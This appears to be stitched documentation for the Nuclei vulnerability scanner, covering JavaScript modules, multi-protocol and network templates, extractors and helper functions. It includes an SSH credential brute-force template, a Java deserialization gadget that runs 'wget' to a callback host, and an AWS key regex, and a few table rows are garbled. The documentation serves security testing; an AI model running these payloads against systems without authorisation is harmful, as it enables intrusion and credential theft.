StructsCalcSize returns the number of bytes needed to pack the values according to the given format.
Ex: structs.CalcSize("H")
#### Parameters
| Name | Type |
| :------- | :------- |
| `format` | `string` |
#### Returns
`number` | `null`
**`Example`**
```javascript
const structs = require('nuclei/structs');
const size = structs.CalcSize('H');
```
#### Defined in
structs.ts:28
***
### Unpack
▸ **Unpack**(`format`, `msg`): `any` | `null`
StructsUnpack the byte slice (presumably packed by Pack(format, msg)) according to the given format.
The result is a \[]interface{} slice even if it contains exactly one item.
The byte slice must contain not less the amount of data required by the format
(len(msg) must more or equal CalcSize(format)).
Ex: structs.Unpack(">I", buff\[:nb])
#### Parameters
| Name | Type |
| :------- | :----------- |
| `format` | `string` |
| `msg` | `Uint8Array` |
#### Returns
`any` | `null`
**`Example`**
```javascript
const structs = require('nuclei/structs');
const result = structs.Unpack('H', [0]);
```
#### Defined in
structs.ts:46
# null
# Namespace: telnet
## Table of contents
### Interfaces
* [IsTelnetResponse](/templates/protocols/javascript/modules/telnet.IsTelnetResponse)
### Functions
* [IsTelnet](/templates/protocols/javascript/modules/telnet#istelnet)
## Functions
### IsTelnet
▸ **IsTelnet**(`host`, `port`): [`IsTelnetResponse`](/templates/protocols/javascript/modules/telnet.IsTelnetResponse) | `null`
IsTelnet checks if a host is running a Telnet server.
#### Parameters
| Name | Type |
| :----- | :------- |
| `host` | `string` |
| `port` | `number` |
#### Returns
[`IsTelnetResponse`](/templates/protocols/javascript/modules/telnet.IsTelnetResponse) | `null`
**`Example`**
```javascript
const telnet = require('nuclei/telnet');
const isTelnet = telnet.IsTelnet('acme.com', 23);
log(toJSON(isTelnet));
```
#### Defined in
telnet.ts:12
# null
# Namespace: vnc
## Table of contents
### Interfaces
* [IsVNCResponse](/templates/protocols/javascript/modules/vnc.IsVNCResponse)
### Functions
* [IsVNC](/templates/protocols/javascript/modules/vnc#isvnc)
## Functions
### IsVNC
▸ **IsVNC**(`host`, `port`): [`IsVNCResponse`](/templates/protocols/javascript/modules/vnc.IsVNCResponse) | `null`
IsVNC checks if a host is running a VNC server.
It returns a boolean indicating if the host is running a VNC server
and the banner of the VNC server.
#### Parameters
| Name | Type |
| :----- | :------- |
| `host` | `string` |
| `port` | `number` |
#### Returns
[`IsVNCResponse`](/templates/protocols/javascript/modules/vnc.IsVNCResponse) | `null`
**`Example`**
```javascript
const vnc = require('nuclei/vnc');
const isVNC = vnc.IsVNC('acme.com', 5900);
log(toJSON(isVNC));
```
#### Defined in
vnc.ts:14
# JavaScript Protocol
Review examples of JavaScript with Nuclei v3
The JavaScript protocol was added to Nuclei v3 to allow you to write checks and detections for exploits in JavaScript and to bridge the gap between network protocols.
* Internally any content written using the JavaScript protocol is executed in Golang.
* The JavaScript protocol is **not** intended to fit into or be imported with any existing JavaScript libraries or frameworks outside of the Nuclei ecosystem.
* Nuclei provides a set of functions, libraries that are tailor-made for writing exploits and checks and only adds required/necessary functionality to complement existing YAML-based DSL.
* The JavaScript protocol is **not** intended to be used as a general purpose JavaScript runtime and does not replace matchers, extractors, or any existing functionality of Nuclei.
* Nuclei v3.0.0 ships with **15+ libraries (ssh, ftp, RDP, Kerberos, and Redis)** tailored for writing exploits and checks in JavaScript and will be continuously expanded in the future.
## Simple Example
Here is a basic example of a JavaScript protocol template:
```yaml
id: ssh-server-fingerprint
info:
name: Fingerprint SSH Server Software
author: Ice3man543,tarunKoyalwar
severity: info
javascript:
- code: |
var m = require("nuclei/ssh");
var c = m.SSHClient();
var response = c.ConnectSSHInfoMode(Host, Port);
to_json(response);
args:
Host: "{{Host}}"
Port: "22"
extractors:
- type: json
json:
- '.ServerID.Raw'
```
In the Nuclei template example above, we are fingerprinting SSH server software by connecting in non-auth mode and extracting the server banner. Let's break down the template.
### Code Section
The `code:` contains actual JavaScript code that is executed by Nuclei at runtime. In the above template, we are:
* Importing `nuclei/ssh` module/library
* Creating a new instance of `SSHClient` object
* Connecting to SSH server in `Info` mode
* Converting response to json
### Args Section
The `args:` section can be simply understood as variables in JavaScript that are passed at runtime and support DSL usage.
### Output Section
The value of the last expression is returned as the output of JavaScript protocol template and can be used in matchers and extractors. If the server returns an error instead, then the `error` variable is exposed in the matcher or extractor with an error message.
## SSH Bruteforce Example
**SSH Password Bruteforce Template**
```yaml
id: ssh-brute
info:
name: SSH Credential Stuffing
author: tarunKoyalwar
severity: critical
javascript:
- pre-condition: |
var m = require("nuclei/ssh");
var c = m.SSHClient();
var response = c.ConnectSSHInfoMode(Host, Port);
// only bruteforce if ssh server allows password based authentication
response["UserAuth"].includes("password")
code: |
var m = require("nuclei/ssh");
var c = m.SSHClient();
c.Connect(Host,Port,Username,Password);
args:
Host: "{{Host}}"
Port: "22"
Username: "{{usernames}}"
Password: "{{passwords}}"
threads: 10
attack: clusterbomb
payloads:
usernames: helpers/wordlists/wp-users.txt
passwords: helpers/wordlists/wp-passwords.txt
stop-at-first-match: true
matchers:
- type: dsl
dsl:
- "response == true"
- "success == true"
condition: and
```
In the example template above, we are bruteforcing ssh server with a list of usernames and passwords. We can tell that this might not have been possible to achieve with the network template. Let's break down the template.
### Pre-Condition
`pre-condition` is an optional section of JavaScript code that is executed before running “code” and acts as a pre-condition to exploit. In the above template, before attempting brute force, we check if:
* The address is actually an SSH server.
* The ssh server is configured to allow password-based authentication.
**Further explanation**
* If pre-condition returns `true` only then `code` is executed; otherwise, it is skipped.
* In the code section, we import `nuclei/ssh` module and create a new instance of `SSHClient` object.
* Then we attempt to connect to the ssh server with a username and password.
This template uses [payloads](https://docs.projectdiscovery.io/templates/protocols/http/http-payloads) to launch a clusterbomb attack with 10 threads and exits on the first match.
Looking at this template now, we can tell that JavaScript templates are powerful for writing multistep and protocol/vendor-specific exploits, which is a primary goal of the JavaScript protocol.
## Init
`init` is an optional JavaScript section that can be used to initialize the template, and it is executed just after compiling the template and before running it on any target. Although it is rarely needed, it can be used to load and preprocess data before running a template on any target.
For example, in the below code block, we are loading all ssh private keys from `nuclei-templates/helpers` directory and storing them as a variable in payloads with the name `keys`. If we were loading private keys from the "pre-condition" code block, then it would have been loaded for every target, which is not ideal.
```
variables:
keysDir: "helpers/" # load all private keys from this directory
javascript:
# init field can be used to make any preperations before the actual exploit
# here we are reading all private keys from helpers folder and storing them in a list
- init: |
let m = require('nuclei/fs');
let privatekeys = m.ReadFilesFromDir(keysDir)
updatePayload('keys',privatekeys)
payloads:
# 'keys' will be updated by actual private keys after init is executed
keys:
- key1
- key2
```
Two special functions that are available in the `init` block are
| Function | Description |
| -------------------------- | ---------------------------------------- |
| `updatePayload(key,value)` | updates payload with given key and value |
| `set(key,value)` | sets a variable with given key and value |
A collection of JavaScript protocol templates can be found [here](https://github.com/projectdiscovery/nuclei-templates/pull/8530).
# Multi-protocol
Learn about multi-protocol support in Nuclei v3
Nuclei provides support for a variety of protocols including HTTP, DNS, Network, SSL, and Code. This allows users to write Nuclei templates for vulnerabilities across these protocols. However, there may be instances where a vulnerability requires the synchronous execution of multiple protocols for testing or exploitation. A prime example of this is **subdomain takeovers**, which necessitates a check for the CNAME record of a subdomain, followed by a verification of string in HTTP response. While this was partially achievable with workflows in Nuclei, the introduction of **Nuclei v3.0** has made it possible to conveniently write a **template** that can execute multiple protocols synchronously. This allows for checks to be performed on the results of each protocol, along with other enhancements.
**Example:**
```yaml
id: dns-http-template
info:
name: dns + http takeover template
author: pdteam
severity: info
dns:
- name: "{{FQDN}}" # dns request
type: cname
http:
- method: GET # http request
path:
- "{{BaseURL}}"
matchers:
- type: dsl
dsl:
- contains(http_body,'Domain not found') # check for string from http response
- contains(dns_cname, 'github.io') # check for cname from dns response
condition: and
```
The example above demonstrates that there is no need for new logic or syntax. Simply write the logic for each protocol and then use the protocol-prefixed variable or the [dynamic extractor](https://docs.projectdiscovery.io/templates/reference/extractors#dynamic-extractor) to export that variable. This variable is then shared across all protocols. We refer to this as the **Template Context**, which contains all variables that are scoped at the template level.
## Features
The following features enhance the power of multi-protocol execution:
* Protocol-Scoped Shared Variables Across Protocols
* Data Export across Protocols using Dynamic Extractor
### Protocol Scoped Variables
In the previous example, we demonstrated how to export the DNS CNAME and use it in an HTTP request. However, you might encounter a scenario where a template includes more than four protocols, and you need to export various response fields such as `subject_dn`, `ns`, `cname`, `header`, and so on. While you could achieve this by adding more dynamic extractors, this approach could clutter the template and introduce redundant logic, making it difficult to track and maintain all the variables.
To address this issue, multi-protocol execution supports template-scoped protocol responses. This means that all response fields from all protocols in a template are available in the template context with a protocol prefix.
Here's an example to illustrate this:
| Protocol | Response Field | Exported Variable |
| -------- | -------------- | ----------------- |
| ssl | subject\_cn | ssl\_subject\_cn |
| dns | cname | dns\_cname |
| http | header | http\_header |
| code | response | code\_response |
This is just an example, but it's important to note that the response fields of all protocols used in a multi-protocol template are exported.
**Example:**
```yaml
id: dns-ssl-http-proto-prefix
info:
name: multi protocol request with response fields
author: pdteam
severity: info
dns:
- name: "{{FQDN}}" # DNS Request
type: cname
ssl:
- address: "{{Hostname}}" # ssl request
http:
- method: GET # http request
path:
- "{{BaseURL}}"
matchers:
- type: dsl
dsl:
- contains(http_body,'ProjectDiscovery.io') # check for http string
- trim_suffix(dns_cname,'.ghost.io.') == 'projectdiscovery' # check for cname (extracted information from dns response)
- ssl_subject_cn == 'blog.projectdiscovery.io'
condition: and
```
To list all exported response fields write a multi protocol template and run it with `-v -svd` flag and it will print all exported response fields
Example:
```bash
nuclei -t multi-protocol-template.yaml -u scanme.sh -debug -svd
```
### Data Export across Protocols
If you are unfamiliar with dynamic extractors, we recommend reading the [dynamic extractor](https://docs.projectdiscovery.io/templates/reference/extractors#dynamic-extractor) section first.
Previously, Dynamic Extractors were only supported for specific protocols or workflows. However, with multi-protocol execution, dynamically extracted values are stored in the template context and can be used across all protocols.
**Example:**
```yaml
id: dns-http-template
info:
name: dns + http takeover template
author: pdteam
severity: info
dns:
- name: "{{FQDN}}" # dns request
type: cname
extractors:
- type: dsl
name: exported_cname
dsl:
- cname
internal: true
http:
- method: GET # http request
path:
- "{{BaseURL}}"
matchers:
- type: dsl
dsl:
- contains(body,'Domain not found') # check for http string
- contains(exported_cname, 'github.io') # check for cname (extracted information from dns response)
condition: and
```
## How Multi Protocol Works?
At this point we have seen how multi protocol templates look like and what are the features it brings to the table. Now let's see how multi protocol templates work and things to keep in mind while writing them.
* Multi Protocol Templates are executed in order of protocols defined in template.
* Protocols in multi protocol templates are executed in serial i.e one after another.
* Response fields of protocols are exported to template context as soon as that protocol is executed.
* Variables are scoped at template level and evaluated after each protocol execution.
* Multi protocol brings limited indirect support for preprocessing(using variables) and postprocessing(using dynamic extractors) for protocols.
## FAQ
**What Protocols are supported in Multi-Protocol Execution Mode?**
> There is no restriction around any protocol and any protocol available/implemented in nuclei engine can be used in multi protocol templates
**How many protocols can be used in Multi-Protocol Execution Mode?**
> There is no restriction around number of protocols but currently duplicated protocols are not supported i.e dns -> http -> ssl -> http. Please open a issue if you have a vulnerabilty/usecase that requires duplicated protocols
**What happens if a protocol fails?**
> Multi Protocol Execution follows exit on error policy i.e if protocol fails to execute then execution of remaining protocols is skipped and template execution is stopped
**How is multi protocol execution different from workflows?**
> Workflow as name suggest is a workflow that executes templates based on workflow file
>
> * Workflow does not contain actual logic of vulnerability but just a workflow that executes different templates
> * Workflow supports conditional execution of multiple templates
> * Workflow has limited supported for variables and dynamic extractors
To summarize workflow is a step higher than template and manages execution of templates based on workflow file
**Is multi protocol execution supported in nuclei v2?**
> No, Multi Protocol Execution is only supported in nuclei v3 and above
# Network Protocol
Learn about network requests with Nuclei
Nuclei can act as an automatable **Netcat**, allowing users to send bytes across the wire and receive them, while providing matching and extracting capabilities on the response.
Network Requests start with a **network** block which specifies the start of the requests for the template.
```yaml
# Start the requests for the template right here
tcp:
```
### Inputs
First thing in the request is **inputs**. Inputs are the data that will be sent to the server, and optionally any data to read from the server.
At its most simple, just specify a string, and it will be sent across the network socket.
```yaml
# inputs is the list of inputs to send to the server
inputs:
- data: "TEST\r\n"
```
You can also send hex encoded text that will be first decoded and the raw bytes will be sent to the server.
```yaml
inputs:
- data: "50494e47"
type: hex
- data: "\r\n"
```
Helper function expressions can also be defined in input and will be first evaluated and then sent to the server. The last Hex Encoded example can be sent with helper functions this way -
```yaml
inputs:
- data: 'hex_decode("50494e47")\r\n'
```
One last thing that can be done with inputs is reading data from the socket. Specifying `read-size` with a non-zero value will do the trick. You can also assign the read data some name, so matching can be done on that part.
```yaml
inputs:
- read-size: 8
```
Example with reading a number of bytes, and only matching on them.
```yaml
inputs:
- read-size: 8
name: prefix
...
matchers:
- type: word
part: prefix
words:
- "CAFEBABE"
```
Multiple steps can be chained together in sequence to do network reading / writing.
### Host
The next part of the requests is the **host** to connect to. Dynamic variables can be placed in the path to modify its value on runtime. Variables start with `{{` and end with `}}` and are case-sensitive.
1. **Hostname** - variable is replaced by the hostname provided on command line.
An example name value:
```yaml
host:
- "{{Hostname}}"
```
Nuclei can also do TLS connection to the target server. Just add `tls://` as prefix before the **Hostname** and you're good to go.
```yaml
host:
- "tls://{{Hostname}}"
```
If a port is specified in the host, the user supplied port is ignored and the template port takes precedence.
### Port
Starting from Nuclei v2.9.15, a new field called `port` has been introduced in network templates. This field allows users to specify the port separately instead of including it in the host field.
Previously, if you wanted to write a network template for an exploit targeting SSH, you would have to specify both the hostname and the port in the host field, like this:
```yaml
host:
- "{{Hostname}}"
- "{{Host}}:22"
```
In the above example, two network requests are sent: one to the port specified in the input/target, and another to the default SSH port (22).
The reason behind introducing the port field is to provide users with more flexibility when running network templates on both default and non-default ports. For example, if a user knows that the SSH service is running on a non-default port of 2222 (after performing a port scan with service discovery), they can simply run:
```bash
$ nuclei -u scanme.sh:2222 -id xyz-ssh-exploit
```
In this case, Nuclei will use port 2222 instead of the default port 22. If the user doesn't specify any port in the input, port 22 will be used by default. However, this approach may not be straightforward to understand and can generate warnings in logs since one request is expected to fail.
Another issue with the previous design of writing network templates is that requests can be sent to unexpected ports. For example, if a web service is running on port 8443 and the user runs:
```bash
$ nuclei -u scanme.sh:8443
```
In this case, `xyz-ssh-exploit` template will send one request to `scanme.sh:22` and another request to `scanme.sh:8443`, which may return unexpected responses and eventually result in errors. This is particularly problematic in automation scenarios.
To address these issues while maintaining the existing functionality, network templates can now be written in the following way:
```yaml
host:
- "{{Hostname}}"
port: 22
```
In this new design, the functionality to run templates on non-standard ports will still exist, except for the default reserved ports (`80`, `443`, `8080`, `8443`, `8081`, `53`). Additionally, the list of default reserved ports can be customized by adding a new field called exclude-ports:
```yaml
exclude-ports: 80,443
```
When `exclude-ports` is used, the default reserved ports list will be overwritten. This means that if you want to run a network template on port `80`, you will have to explicitly specify it in the port field.
Starting from Nuclei v3.1.0 `port` field supports comma seperated values and multi ports can be specified in the port field. For example, if you want to run a network template on port `5432` and `5433`, you can specify it in the port field like this:
```yaml
port: 5432,5433
```
In this case, Nuclei will first check if port is open from list and run template only on open ports
#### Matchers / Extractor Parts
Valid `part` values supported by **Network** protocol for Matchers / Extractor are -
| Value | Description |
| ---------------- | ----------------------------------- |
| request | Network Request |
| data | Final Data Read From Network Socket |
| raw / body / all | All Data received from Socket |
### **Example Network Template**
The final example template file for a `hex` encoded input to detect MongoDB running on servers with working matchers is provided below.
```yaml
id: input-expressions-mongodb-detect
info:
name: Input Expression MongoDB Detection
author: pdteam
severity: info
reference: https://github.com/orleven/Tentacle
tcp:
- inputs:
- data: "{{hex_decode('3a000000a741000000000000d40700000000000061646d696e2e24636d640000000000ffffffff130000001069736d6173746572000100000000')}}"
host:
- "{{Hostname}}"
port: 27017
read-size: 2048
matchers:
- type: word
words:
- "logicalSessionTimeout"
- "localTime"
```
More complete examples are provided [here](/templates/protocols/network-examples).
# Extractors
Review details on extractors for Nuclei
Extractors can be used to extract and display in results a match from the response returned by a module.
### Types
Multiple extractors can be specified in a request. As of now we support five type of extractors.
1. **regex** - Extract data from response based on a Regular Expression.
2. **kval** - Extract `key: value`/`key=value` formatted data from Response Header/Cookie
3. **json** - Extract data from JSON based response in JQ like syntax.
4. **xpath** - Extract xpath based data from HTML Response
5. **dsl** - Extract data from the response based on a DSL expressions.
### Regex Extractor
Example extractor for HTTP Response body using **regex** -
```yaml
extractors:
- type: regex # type of the extractor
part: body # part of the response (header,body,all)
regex:
- "(A3T[A-Z0-9]|AKIA|AGPA|AROA|AIPA|ANPA|ANVA|ASIA)[A-Z0-9]{16}" # regex to use for extraction.
```
### Kval Extractor
A **kval** extractor example to extract `content-type` header from HTTP Response.
```yaml
extractors:
- type: kval # type of the extractor
kval:
- content_type # header/cookie value to extract from response
```
Note that `content-type` has been replaced with `content_type` because **kval** extractor does not accept dash (`-`) as input and must be substituted with underscore (`_`).
### JSON Extractor
A **json** extractor example to extract value of `id` object from JSON block.
```yaml
- type: json # type of the extractor
part: body
name: user
json:
- '.[] | .id' # JQ like syntax for extraction
```
For more details about JQ - [https://github.com/stedolan/jq](https://github.com/stedolan/jq)
### Xpath Extractor
A **xpath** extractor example to extract value of `href` attribute from HTML response.
```yaml
extractors:
- type: xpath # type of the extractor
attribute: href # attribute value to extract (optional)
xpath:
- '/html/body/div/p[2]/a' # xpath value for extraction
```
With a simple [copy paste in browser](https://www.scientecheasy.com/2020/07/find-xpath-chrome.html/), we can get the **xpath** value form any web page content.
### DSL Extractor
A **dsl** extractor example to extract the effective `body` length through the `len` helper function from HTTP Response.
```yaml
extractors:
- type: dsl # type of the extractor
dsl:
- len(body) # dsl expression value to extract from response
```
### Dynamic Extractor
Extractors can be used to capture Dynamic Values on runtime while writing Multi-Request templates. CSRF Tokens, Session Headers, etc. can be extracted and used in requests. This feature is only available in RAW request format.
Example of defining a dynamic extractor with name `api` which will capture a regex based pattern from the request.
```yaml
extractors:
- type: regex
name: api
part: body
internal: true # Required for using dynamic variables
regex:
- "(?m)[0-9]{3,10}\\.[0-9]+"
```
The extracted value is stored in the variable **api**, which can be utilised in any section of the subsequent requests.
If you want to use extractor as a dynamic variable, you must use `internal: true` to avoid printing extracted values in the terminal.
An optional regex **match-group** can also be specified for the regex for more complex matches.
```yaml
extractors:
- type: regex # type of extractor
name: csrf_token # defining the variable name
part: body # part of response to look for
# group defines the matching group being used.
# In GO the "match" is the full array of all matches and submatches
# match[0] is the full match
# match[n] is the submatches. Most often we'd want match[1] as depicted below
group: 1
regex:
- ''
```
The above extractor with name `csrf_token` will hold the value extracted by `([[:alnum:]]{16})` as `abcdefgh12345678`.
If no group option is provided with this regex, the above extractor with name `csrf_token` will hold the full match (by ``) as ``.
### Reusable Dynamic Extractors
With Nuclei v3.1.4 you can now reuse dynamic extracted value (ex: csrf\_token in above example) immediately in next extractors and is by default available in subsequent requests
Example:
```
id: basic-raw-example
info:
name: Test RAW Template
author: pdteam
severity: info
http:
- raw:
- |
GET / HTTP/1.1
Host: {{Hostname}}
extractors:
- type: regex
name: title
group: 1
regex:
- '(.*)<\/title>'
internal: true
- type: dsl
dsl:
- '"Title is " + title'
```
# Helper Functions
Review details on helper functions for Nuclei
Here is the list of all supported helper functions can be used in the RAW requests / Network requests.
| Helper function | Description | Example | Output |
| ---------------------------------------------------------------------- | ------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- | -------------------------------------------------------------------------------------------------------------------------------------------------------- | ------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------ |
| aes\_gcm(key, plaintext interface{}) \[]byte | AES GCM encrypts a string with key | `{{hex_encode(aes_gcm("AES256Key-32Characters1234567890", "exampleplaintext"))}}` | `ec183a153b8e8ae7925beed74728534b57a60920c0b009eaa7608a34e06325804c096d7eebccddea3e5ed6c4` |
| base64(src interface{}) string | Base64 encodes a string | `base64("Hello")` | `SGVsbG8=` |
| base64\_decode(src interface{}) \[]byte | Base64 decodes a string | `base64_decode("SGVsbG8=")` | `Hello` |
| base64\_py(src interface{}) string | Encodes string to base64 like python (with new lines) | `base64_py("Hello")` | `SGVsbG8=\n` |
| bin\_to\_dec(binaryNumber number \| string) float64 | Transforms the input binary number into a decimal format | `bin_to_dec("0b1010")` `bin_to_dec(1010)` | `10` |
| compare\_versions(versionToCheck string, constraints ...string) bool | Compares the first version argument with the provided constraints | `compare_versions('v1.0.0', '\>v0.0.1', '\`date_time("%Y-%M-%D %H:%m", 1654870680)` `date_time("2006-01-02 15:04", unix_time())` | `2022-06-10 14:18` |
| dec\_to\_hex(number number \| string) string | Transforms the input number into hexadecimal format | `dec_to_hex(7001)"` | `1b59` |
| ends\_with(str string, suffix ...string) bool | Checks if the string ends with any of the provided substrings | `ends_with("Hello", "lo")` | `true` |
| generate\_java\_gadget(gadget, cmd, encoding interface{}) string | Generates a Java Deserialization Gadget | `generate_java_gadget("dns", "{{interactsh-url}}", "base64")` | `rO0ABXNyABFqYXZhLnV0aWwuSGFzaE1hcAUH2sHDFmDRAwACRgAKbG9hZEZhY3RvckkACXRocmVzaG9sZHhwP0AAAAAAAAx3CAAAABAAAAABc3IADGphdmEubmV0LlVSTJYlNzYa/ORyAwAHSQAIaGFzaENvZGVJAARwb3J0TAAJYXV0aG9yaXR5dAASTGphdmEvbGFuZy9TdHJpbmc7TAAEZmlsZXEAfgADTAAEaG9zdHEAfgADTAAIcHJvdG9jb2xxAH4AA0wAA3JlZnEAfgADeHD//////////3QAAHQAAHEAfgAFdAAFcHh0ACpjYWhnMmZiaW41NjRvMGJ0MHRzMDhycDdlZXBwYjkxNDUub2FzdC5mdW54` |
| generate\_jwt(json, algorithm, signature, unixMaxAge) \[]byte | Generates a JSON Web Token (JWT) using the claims provided in a JSON string, the signature, and the specified algorithm | `generate_jwt("{\"name\":\"John Doe\",\"foo\":\"bar\"}", "HS256", "hello-world")` | `eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJmb28iOiJiYXIiLCJuYW1lIjoiSm9obiBEb2UifQ.EsrL8lIcYJR_Ns-JuhF3VCllCP7xwbpMCCfHin_WT6U` |
| gzip(input string) string | Compresses the input using GZip | `base64(gzip("Hello"))` | `+H4sIAAAAAAAA//JIzcnJBwQAAP//gonR9wUAAAA=` |
| gzip\_decode(input string) string | Decompresses the input using GZip | `gzip_decode(hex_decode("1f8b08000000000000fff248cdc9c907040000ffff8289d1f705000000"))` | `Hello` |
| hex\_decode(input interface{}) \[]byte | Hex decodes the given input | `hex_decode("6161")` | `aa` |
| hex\_encode(input interface{}) string | Hex encodes the given input | `hex_encode("aa")` | `6161` |
| hex\_to\_dec(hexNumber number \| string) float64 | Transforms the input hexadecimal number into decimal format | `hex_to_dec("ff")` `hex_to_dec("0xff")` | `255` |
| hmac(algorithm, data, secret) string | hmac function that accepts a hashing function type with data and secret | `hmac("sha1", "test", "scrt")` | `8856b111056d946d5c6c92a21b43c233596623c6` |
| html\_escape(input interface{}) string | HTML escapes the given input | `html_escape("\test\")` | `<body>test</body>` |
| html\_unescape(input interface{}) string | HTML un-escapes the given input | `html_unescape("<body>test</body>")` | `\test\` |
| join(separator string, elements ...interface{}) string | Joins the given elements using the specified separator | `join("_", 123, "hello", "world")` | `123_hello_world` |
| json\_minify(json) string | Minifies a JSON string by removing unnecessary whitespace | `json_minify("{ \"name\": \"John Doe\", \"foo\": \"bar\" }")` | `{"foo":"bar","name":"John Doe"}` |
| json\_prettify(json) string | Prettifies a JSON string by adding indentation | `json_prettify("{\"foo\":\"bar\",\"name\":\"John Doe\"}")` | `{\n \"foo\": \"bar\",\n \"name\": \"John Doe\"\n}` |
| len(arg interface{}) int | Returns the length of the input | `len("Hello")` | `5` |
| line\_ends\_with(str string, suffix ...string) bool | Checks if any line of the string ends with any of the provided substrings | `line_ends_with("Hello\nHi", "lo")` | `true` |
| line\_starts\_with(str string, prefix ...string) bool | Checks if any line of the string starts with any of the provided substrings | `line_starts_with("Hi\nHello", "He")` | `true` |
| md5(input interface{}) string | Calculates the MD5 (Message Digest) hash of the input | `md5("Hello")` | `8b1a9953c4611296a827abf8c47804d7` |
| mmh3(input interface{}) string | Calculates the MMH3 (MurmurHash3) hash of an input | `mmh3("Hello")` | `316307400` |
| oct\_to\_dec(octalNumber number \| string) float64 | Transforms the input octal number into a decimal format | `oct_to_dec("0o1234567")` `oct_to_dec(1234567)` | `342391` |
| print\_debug(args ...interface{}) | Prints the value of a given input or expression. Used for debugging. | `print_debug(1+2, "Hello")` | `3 Hello` |
| rand\_base(length uint, optionalCharSet string) string | Generates a random sequence of given length string from an optional charset (defaults to letters and numbers) | `rand_base(5, "abc")` | `caccb` |
| rand\_char(optionalCharSet string) string | Generates a random character from an optional character set (defaults to letters and numbers) | `rand_char("abc")` | `a` |
| rand\_int(optionalMin, optionalMax uint) int | Generates a random integer between the given optional limits (defaults to 0 - MaxInt32) | `rand_int(1, 10)` | `6` |
| rand\_text\_alpha(length uint, optionalBadChars string) string | Generates a random string of letters, of given length, excluding the optional cutset characters | `rand_text_alpha(10, "abc")` | `WKozhjJWlJ` |
| rand\_text\_alphanumeric(length uint, optionalBadChars string) string | Generates a random alphanumeric string, of given length without the optional cutset characters | `rand_text_alphanumeric(10, "ab12")` | `NthI0IiY8r` |
| rand\_ip(cidr ...string) string | Generates a random IP address | `rand_ip("192.168.0.0/24")` | `192.168.0.171` |
| rand\_text\_numeric(length uint, optionalBadNumbers string) string | Generates a random numeric string of given length without the optional set of undesired numbers | `rand_text_numeric(10, 123)` | `0654087985` |
| regex(pattern, input string) bool | Tests the given regular expression against the input string | `regex("H([a-z]+)o", "Hello")` | `true` |
| remove\_bad\_chars(input, cutset interface{}) string | Removes the desired characters from the input | `remove_bad_chars("abcd", "bc")` | `ad` |
| repeat(str string, count uint) string | Repeats the input string the given amount of times | `repeat("../", 5)` | `../../../../../` |
| replace(str, old, new string) string | Replaces a given substring in the given input | `replace("Hello", "He", "Ha")` | `Hallo` |
| replace\_regex(source, regex, replacement string) string | Replaces substrings matching the given regular expression in the input | `replace_regex("He123llo", "(\\d+)", "")` | `Hello` |
| reverse(input string) string | Reverses the given input | `reverse("abc")` | `cba` |
| sha1(input interface{}) string | Calculates the SHA1 (Secure Hash 1) hash of the input | `sha1("Hello")` | `f7ff9e8b7bb2e09b70935a5d785e0cc5d9d0abf0` |
| sha256(input interface{}) string | Calculates the SHA256 (Secure Hash 256) hash of the input | `sha256("Hello")` | `185f8db32271fe25f561a6fc938b2e264306ec304eda518007d1764826381969` |
| starts\_with(str string, prefix ...string) bool | Checks if the string starts with any of the provided substrings | `starts_with("Hello", "He")` | `true` |
| to\_lower(input string) string | Transforms the input into lowercase characters | `to_lower("HELLO")` | `hello` |
| to\_unix\_time(input string, layout string) int | Parses a string date time using default or user given layouts, then returns its Unix timestamp | `to_unix_time("2022-01-13T16:30:10+00:00")` `to_unix_time("2022-01-13 16:30:10")` `to_unix_time("13-01-2022 16:30:10", "02-01-2006 15:04:05")` | `1642091410` |
| to\_upper(input string) string | Transforms the input into uppercase characters | `to_upper("hello")` | `HELLO` |
| trim(input, cutset string) string | Returns a slice of the input with all leading and trailing Unicode code points contained in cutset removed | `trim("aaaHelloddd", "ad")` | `Hello` |
| trim\_left(input, cutset string) string | Returns a slice of the input with all leading Unicode code points contained in cutset removed | `trim_left("aaaHelloddd", "ad")` | `Helloddd` |
| trim\_prefix(input, prefix string) string | Returns the input without the provided leading prefix string | `trim_prefix("aaHelloaa", "aa")` | `Helloaa` |
| trim\_right(input, cutset string) string | Returns a string, with all trailing Unicode code points contained in cutset removed | `trim_right("aaaHelloddd", "ad")` | `aaaHello` |
| trim\_space(input string) string | Returns a string, with all leading and trailing white space removed, as defined by Unicode | `trim_space(" Hello ")` | `"Hello"` |
| trim\_suffix(input, suffix string) string | Returns input without the provided trailing suffix string | `trim_suffix("aaHelloaa", "aa")` | `aaHello` |
| unix\_time(optionalSeconds uint) float64 | Returns the current Unix time (number of seconds elapsed since January 1, 1970 UTC) with the added optional seconds | `unix_time(10)` | `1639568278` |
| url\_decode(input string) string | URL decodes the input string | `url_decode("https:%2F%2Fprojectdiscovery.io%3Ftest=1")` | `https://projectdiscovery.io?test=1` |
| url\_encode(input string) string | URL encodes the input string | `url_encode("https://projectdiscovery.io/test?a=1")` | `https%3A%2F%2Fprojectdiscovery.io%2Ftest%3Fa%3D1` |
| wait\_for(seconds uint) | Pauses the execution for the given amount of seconds | `wait_for(10)` | `true` |
| zlib(input string) string | Compresses the input using Zlib | `base64(zlib("Hello"))` | `eJzySM3JyQcEAAD//wWMAfU=` |
| zlib\_decode(input string) string | Decompresses the input using Zlib | `zlib_decode(hex_decode("789cf248cdc9c907040000ffff058c01f5"))` | `Hello` |
| resolve(host string, format string) string | Resolves a host using a dns type that you define | `resolve("localhost",4)` | `127.0.0.1` |
| ip\_format(ip string, format string) string | It takes an input ip and converts it to another format according to this [legend](https://github.com/projectdiscovery/mapcidr/wiki/IP-Format-Index), the second parameter indicates the conversion index and must be between 1 and 11 | `ip_format("127.0.0.1", 3)` | `0177.0.0.01` |
## Deserialization helper functions
Nuclei allows payload generation for a few common gadget from [ysoserial](https://github.com/frohoff/ysoserial).
**Supported Payload:**
* `dns` (URLDNS)
* `commons-collections3.1`
* `commons-collections4.0`
* `jdk7u21`
* `jdk8u20`
* `groovy1`
**Supported encodings:**
* `base64` (default)
* `gzip-base64`
* `gzip`
* `hex`
* `raw`
**Deserialization helper function format:**
```yaml
{ { generate_java_gadget(payload, cmd, encoding } }
```
**Deserialization helper function example:**
```yaml
{{generate_java_gadget("commons-collections3.1", "wget http://{{interactsh-url}}", "base64")}}
```
## JSON helper functions
Nuclei allows manipulate JSON strings in different ways, here is a list of its functions:
* `generate_jwt`, to generates a JSON Web Token (JWT) using the claims provided in a JSON string, the signature, and the specified algorithm.
